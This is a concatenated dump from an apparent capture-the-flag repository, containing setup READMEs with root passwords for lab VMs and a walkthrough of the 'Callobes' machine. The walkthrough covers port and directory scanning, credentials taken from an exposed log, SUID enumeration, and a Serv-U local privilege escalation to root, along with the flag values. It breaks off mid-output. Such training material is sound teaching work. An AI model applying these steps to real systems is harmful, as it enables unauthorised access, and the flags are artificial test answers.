Thrones/Machines/Blitz/Screenshots/file-upload-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-1.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/file-upload-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-2.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/file-upload-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-3.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/git-gitserver-staging.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/git-gitserver-staging.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/git-ls-la.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/git-ls-la.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/git-pipeline-staging.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/git-pipeline-staging.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/jenkins-app-dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-app-dashboard.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/jenkins-build.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-build.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/jenkins-dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-dashboard.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/jenkins-landing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-landing.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/jenkins-login-screen.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-login-screen.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/jwt-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jwt-1.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/jwt-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jwt-2.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/jwt-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jwt-3.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/main-landing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/main-landing.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/main-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/main-login.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/make-admin-added-new-admin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/make-admin-added-new-admin.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/prod-web-root.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/prod-web-root.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/registration-test.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/registration-test.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/shell-as-postgres.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/shell-as-postgres.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/source-code-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/source-code-1.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/sql-0-intercept.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/sql-0-intercept.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/sql-1-create-table.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/sql-1-create-table.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/sql-2-rce.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/sql-2-rce.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Bytescribe/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | 1. Use the installation link to download the .ova file. 4 | 2. Import the image file to VMware using File -> Open 5 | 6 | ![image](Screenshots/Screenshot-2023-10-06-024100.png) 7 | 8 | > [!WARNING] 9 | > The images are not supported by virtualbox. 10 | 11 | 3. Choose a Virtual Machine name and location for the new VM. 12 | 4. The default Network Interface is configured as NAT. If not, please do so. 13 | 5. You can find IP address of the machine using arp-scan in your kali machine. 14 | ``` 15 | ┌──(kali㉿kali)-[~] 16 | └─$ sudo arp-scan -l 17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:f7:91:2b, IPv4: 192.168.163.133 18 | Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 19 | 192.168.163.1 00:50:56:c0:00:08 VMware, Inc. 20 | 192.168.163.2 00:50:56:e9:26:ad VMware, Inc. 21 | 192.168.163.135 00:0c:29:15:64:ff VMware, Inc. 22 | 192.168.163.254 00:50:56:fb:dd:06 VMware, Inc. 23 | 24 | 4 packets received by filter, 0 packets dropped by kernel 25 | Ending arp-scan 1.10.0: 256 hosts scanned in 2.018 seconds (126.86 hosts/sec). 4 responded 26 | 27 | ┌──(kali㉿kali)-[~] 28 | └─$ ssh root@192.168.163.135 29 | The authenticity of host '192.168.163.135 (192.168.163.135)' can't be established. 30 | ED25519 key fingerprint is SHA256:FgEM7djbdkf6qtvyLOr4TPV35vMzjmXSJ09Cm8VHB8k. 31 | This key is not known by any other names. 32 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 33 | Warning: Permanently added '192.168.163.135' (ED25519) to the list of known hosts. 34 | root@192.168.163.135's password: 35 | Permission denied, please try again. 36 | root@192.168.163.135's password: 37 | Permission denied, please try again. 38 | root@192.168.163.135's password: 39 | Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-33-generic x86_64) 40 | 41 | * Documentation: https://help.ubuntu.com 42 | * Management: https://landscape.canonical.com 43 | * Support: https://ubuntu.com/advantage 44 | 45 | Expanded Security Maintenance for Applications is not enabled. 46 | 47 | 28 updates can be applied immediately. 48 | 27 of these updates are standard security updates. 49 | To see these additional updates run: apt list --upgradable 50 | 51 | Enable ESM Apps to receive additional future security updates. 52 | See https://ubuntu.com/esm or run: sudo pro status 53 | 54 | Last login: Thu Sep 14 21:15:45 2023 from 10.1.3.1 55 | root@bytescribe-virtual-machine:~# 56 | 57 | ``` 58 | 6. If something goes wrong, use the credentials provided below to access the machine. 59 | 60 | # Credentials 61 | ``` 62 | root:qpWO10@( 63 | ``` 64 | -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-024100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-024100.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-035333.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-035333.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Callobes/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | 1. Use the installation link to download the .ova file. 4 | 2. Import the image file to VMware using File -> Open 5 | 6 | ![Alt text](Screenshots/image-1.png) 7 | 8 | > [!WARNING] 9 | > The images are not supported by virtualbox. 10 | 11 | 3. Choose a Virtual Machine name and location for the new VM. 12 | 4. The default Network Interface is configured as NAT. If not, please do so. 13 | 5. You can find IP address of the machine using arp-scan in your kali machine. 14 | ``` 15 | ┌──(kali㉿kali)-[~] 16 | └─$ sudo arp-scan -l 17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128 18 | Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan) 19 | 192.168.121.1 00:50:56:c0:00:08 VMware, Inc. 20 | 192.168.121.2 00:50:56:f2:3b:82 VMware, Inc. 21 | 192.168.121.129 00:0c:29:c7:d8:5e VMware, Inc. 22 | 192.168.121.254 00:50:56:e4:f5:4c VMware, Inc. 23 | 24 | 4 packets received by filter, 0 packets dropped by kernel 25 | Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded 26 | 27 | ┌──(kali㉿kali)-[~] 28 | └─$ ssh root@192.168.121.129 29 | root@192.168.121.129's password: 30 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64) 31 | 32 | * Documentation: https://help.ubuntu.com 33 | * Management: https://landscape.canonical.com 34 | * Support: https://ubuntu.com/advantage 35 | 36 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s 37 | just raised the bar for easy, resilient and secure K8s cluster deployment. 38 | 39 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge 40 | 41 | * Canonical Livepatch is available for installation. 42 | - Reduce system reboots and improve kernel security. Activate at: 43 | https://ubuntu.com/livepatch 44 | 45 | 74 packages can be updated. 46 | 28 updates are security updates. 47 | 48 | New release '20.04.6 LTS' available. 49 | Run 'do-release-upgrade' to upgrade to it. 50 | 51 | Your Hardware Enablement Stack (HWE) is supported until April 2023. 52 | Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128 53 | root@shimishao:~# 54 | ``` 55 | 56 | 57 | 6. If something goes wrong, use the credentials provided below to access the machine. 58 | 59 | # Credentials 60 | ``` 61 | root:1qaSDFgtr 62 | ``` 63 | -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Callobes/Screenshots/image-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-1.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Callobes/Screenshots/image-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-2.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Callobes/Screenshots/image-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-3.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Callobes/Screenshots/image-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-4.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Callobes/Screenshots/image-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-5.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Callobes/Screenshots/image-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-6.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Callobes/Screenshots/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Callobes/Walkthrough.md: -------------------------------------------------------------------------------- 1 | # Callobes 2 | 3 | This machine is taken from [Vulnhub](https://www.vulnhub.com/entry/election-1,503/) to support the idea of open source! We intend to continue sharing our projects as open source in the future. 4 | 5 | There are several ways to exploit the machine, and we are currently sharing one method. You are encouraged to explore and discover other paths independently. 6 | 7 | ## High Level Overview 8 | "Callobes" is a Linux-based easy Capture The Flag (CTF) machine that presents an engaging and challenging cybersecurity scenario. Here's a brief overview: 9 | This machine features both a web server and an SSH server. The web server has Path Traversal vulnerability hiding a crucial piece of information, specifically credentials, within a file. 10 | Upon successfully gaining an initial foothold, you'll discover a setuid binary named "Serv-u." This binary holds the key to escalating your privileges and potentially achieving root access on the system. 11 | "Callobes" promises to challenge your skills in web exploitation, Linux privilege escalation, and potentially other areas of cybersecurity, making it an exciting platform for honing your penetration testing abilities. 12 | 13 | ## Enumerating the target 14 | Run a full-range port scan to find all open ports. 15 | 16 | ``` 17 | ┌──(kali㉿kali)-[~] 18 | └─$ nmap -p- 192.168.121.129 19 | Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-05 19:10 EDT 20 | Nmap scan report for 192.168.121.129 21 | Host is up (0.00028s latency). 22 | Not shown: 65533 closed tcp ports (conn-refused) 23 | PORT STATE SERVICE 24 | 22/tcp open ssh 25 | 80/tcp open http 26 | 27 | Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds 28 | 29 | ``` 30 | Nmap found two tcp ports (22, 80) 31 | 32 | Navigating to the IP address in a browser we see the following. 33 | 34 | ![Alt text](Screenshots/image-2.png) 35 | 36 | let’s run a dirbuster: 37 | ``` 38 | ┌──(kali㉿kali)-[~] 39 | └─$ dirb http://192.168.121.129 40 | 41 | ----------------- 42 | DIRB v2.22 43 | By The Dark Raver 44 | ----------------- 45 | 46 | START_TIME: Thu Oct 5 19:47:57 2023 47 | URL_BASE: http://192.168.121.129/ 48 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt 49 | 50 | ----------------- 51 | 52 | GENERATED WORDS: 4612 53 | 54 | ---- Scanning URL: http://192.168.121.129/ ---- 55 | + http://192.168.121.129/index.html (CODE:200|SIZE:10918) 56 | ==> DIRECTORY: http://192.168.121.129/javascript/ 57 | + http://192.168.121.129/phpinfo.php (CODE:200|SIZE:95537) 58 | ==> DIRECTORY: http://192.168.121.129/phpmyadmin/ 59 | + http://192.168.121.129/robots.txt (CODE:200|SIZE:31) 60 | + http://192.168.121.129/server-status (CODE:403|SIZE:280) 61 | 62 | ``` 63 | With dirbuster we have an access directory, as well as an index.html, and robots.txt file 64 | As seen above we see a directory named robots.txt. 65 | 66 | First, navigate to the robots.txt file. We have four words in the robots.txt directory, as seen below. 67 | 68 | ![Alt text](Screenshots/image-3.png) 69 | 70 | We just only have access to the Shimishao directory. 71 | 72 | We can use the dirbuster tool again in the Shimishao directory 73 | ``` 74 | ┌──(kali㉿kali)-[~] 75 | └─$ dirb http://192.168.121.129/shimishao 76 | 77 | ----------------- 78 | DIRB v2.22 79 | By The Dark Raver 80 | ----------------- 81 | 82 | START_TIME: Thu Oct 5 19:58:42 2023 83 | URL_BASE: http://192.168.121.129/shimishao/ 84 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt 85 | 86 | ----------------- 87 | 88 | GENERATED WORDS: 4612 89 | 90 | ---- Scanning URL: http://192.168.121.129/shimishao/ ---- 91 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/ 92 | ==> DIRECTORY: http://192.168.121.129/shimishao/data/ 93 | + http://192.168.121.129/shimishao/index.php (CODE:200|SIZE:6597) 94 | ==> DIRECTORY: http://192.168.121.129/shimishao/js/ 95 | ==> DIRECTORY: http://192.168.121.129/shimishao/languages/ 96 | ==> DIRECTORY: http://192.168.121.129/shimishao/lib/ 97 | ==> DIRECTORY: http://192.168.121.129/shimishao/media/ 98 | ==> DIRECTORY: http://192.168.121.129/shimishao/themes/ 99 | 100 | ---- Entering directory: http://192.168.121.129/shimishao/admin/ ---- 101 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/ajax/ 102 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/components/ 103 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/css/ 104 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/img/ 105 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/inc/ 106 | + http://192.168.121.129/shimishao/admin/index.php (CODE:200|SIZE:8967) 107 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/js/ 108 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/logs/ 109 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/plugins/ 110 | 111 | ``` 112 | As seen above, we can see shmishao/admin/logs directory which is useful for us. 113 | Let's try directly access this directory: 114 | 115 | ![Alt text](Screenshots/image-4.png) 116 | 117 | We see system.log file . Install this and see what we found. 118 | ![Alt text](Screenshots/image-5.png) 119 | 120 | As seen above we got our credentials for the ubuntu user pred8or. Now we can use these credentials to log in ssh. 121 | 122 | ``` 123 | ┌──(kali㉿kali)-[~] 124 | └─$ ssh pred8or@192.168.121.129 125 | pred8or@192.168.121.129's password: 126 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64) 127 | 128 | * Documentation: https://help.ubuntu.com 129 | * Management: https://landscape.canonical.com 130 | * Support: https://ubuntu.com/advantage 131 | 132 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s 133 | just raised the bar for easy, resilient and secure K8s cluster deployment. 134 | 135 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge 136 | 137 | * Canonical Livepatch is available for installation. 138 | - Reduce system reboots and improve kernel security. Activate at: 139 | https://ubuntu.com/livepatch 140 | 141 | 74 packages can be updated. 142 | 28 updates are security updates. 143 | 144 | New release '20.04.6 LTS' available. 145 | Run 'do-release-upgrade' to upgrade to it. 146 | 147 | Your Hardware Enablement Stack (HWE) is supported until April 2023. 148 | Last login: Tue Oct 3 03:42:01 2023 from 192.168.163.1 149 | pred8or@shimishao:~$ 150 | ``` 151 | 152 | From there we can see that we have found the user1.txt file. Let's read it via cat user1.txt. We've successfully found the flag! 153 | 154 | ``` 155 | pred8or@shimishao:~$ ls 156 | Desktop Documents Downloads Music Pictures Public Templates user1.txt Videos 157 | pred8or@shimishao:~$ cat user1.txt 158 | ICSD{66d74978b307889bea234a4bc6570a36} 159 | 160 | ``` 161 | 162 | Privilege escelation is the process of going from lower permissions to higher permission. This is done by exploiting vulnerabilities, design flaws or misconfigurations in applications. This process is very important. 163 | 164 | By using the following command you can enumerate all binaries having SUID permissions: 165 | 166 | ``` 167 | find / -perm -u=s -type f 2>/dev/null 168 | ``` 169 | ``` 170 | pred8or@shimishao:/$ find / -perm -u=s -type f 2>/dev/null 171 | /usr/bin/arping 172 | /usr/bin/passwd 173 | /usr/bin/pkexec 174 | /usr/bin/traceroute6.iputils 175 | /usr/bin/newgrp 176 | /usr/bin/chsh 177 | /usr/bin/chfn 178 | /usr/bin/gpasswd 179 | /usr/bin/sudo 180 | /usr/sbin/pppd 181 | /usr/local/Serv-U/Serv-U 182 | 183 | 184 | ``` 185 | 186 | Following the execution of the specified command, we have identified the Serv-U with suid (Set User ID) permissions. Let's google it and see what vulnerability we find. 187 | 188 | ![Alt text](Screenshots/image-6.png) 189 | 190 | In Exploit-DB "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation" we found vulnerable version. 191 | 192 | https://www.exploit-db.com/exploits/47173 193 | 194 | Let's exploit it: 195 | 196 | We copy this bash script and run it in our home directory. 197 | 198 | ``` 199 | pred8or@shimishao:~$ ls 200 | b.sh Desktop Documents Downloads Music Pictures Public Templates user1.txt Videos 201 | pred8or@shimishao:~$ bash b.sh 202 | [*] Launching Serv-U ... 203 | sh: 1: : Permission denied 204 | [+] Success: 205 | -rwsr-xr-x 1 root root 1113504 Oct 6 07:12 /tmp/sh 206 | [*] Launching root shell: /tmp/sh 207 | sh-4.4# whoami 208 | root 209 | sh-4.4# cd /root 210 | sh-4.4# ls 211 | root.txt 212 | sh-4.4# cat root.txt 213 | ICSD{45caa8f3afa6fc94aa3c039ceeeb7883} 214 | sh-4.4# 215 | ``` 216 | 217 | -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | 1. Use the installation link to download the .ova file. 4 | 2. Import the image file to VMware using File -> Open 5 | 6 | > [!WARNING] 7 | > The images are not supported by virtualbox. 8 | 9 | 3. Choose a Virtual Machine name and location for the new VM. 10 | 4. The default Network Interface is configured as NAT. If not, please do so. 11 | 5. You can find IP address of the machine using arp-scan in your kali machine. 12 | ``` 13 | ┌──(kali㉿kali)-[~/Captivity] 14 | └─$ sudo arp-scan -l 15 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:ee:f4:ad, IPv4: 192.168.100.132 16 | Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 17 | 192.168.100.1 00:50:56:c0:00:08 VMware, Inc. 18 | 192.168.100.2 00:50:56:e5:ad:c6 VMware, Inc. 19 | 192.168.100.130 00:0c:29:94:0e:fd VMware, Inc. 20 | 192.168.100.254 00:50:56:fa:13:b9 VMware, Inc. 21 | 22 | 4 packets received by filter, 0 packets dropped by kernel 23 | Ending arp-scan 1.10.0: 256 hosts scanned in 2.303 seconds (111.16 hosts/sec). 4 responded 24 | ``` 25 | 6. If something goes wrong, use the credentials provided below to access the machine. 26 | 27 | # Credentials 28 | ``` 29 | Administrator:gnE4ZqIYDxX78uPek1Xo 30 | ``` 31 | -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/80_landing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/80_landing.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-analysis.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-login.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path-2.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard-2.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-landing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-landing.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-login.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit-2.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/google-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/google-exploit.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Captivity/Screenshots/neo4j-initialize.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/neo4j-initialize.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Gitlab/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | 1. Use the installation link to download the .ova file. 4 | 2. Import the image file to VMware using File -> Open 5 | 6 | ![Alt text](Screenshots/image-1.png) 7 | 8 | > [!WARNING] 9 | > The images are not supported by virtualbox. 10 | 11 | 3. Choose a Virtual Machine name and location for the new VM. 12 | 4. The default Network Interface is configured as NAT. If not, please do so. 13 | 5. You can find IP address of the machine using arp-scan in your kali machine. 14 | ``` 15 | ┌──(kali㉿kali)-[~] 16 | └─$ sudo arp-scan -l 17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128 18 | Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan) 19 | 192.168.121.1 00:50:56:c0:00:08 VMware, Inc. 20 | 192.168.121.2 00:50:56:f2:3b:82 VMware, Inc. 21 | 192.168.121.129 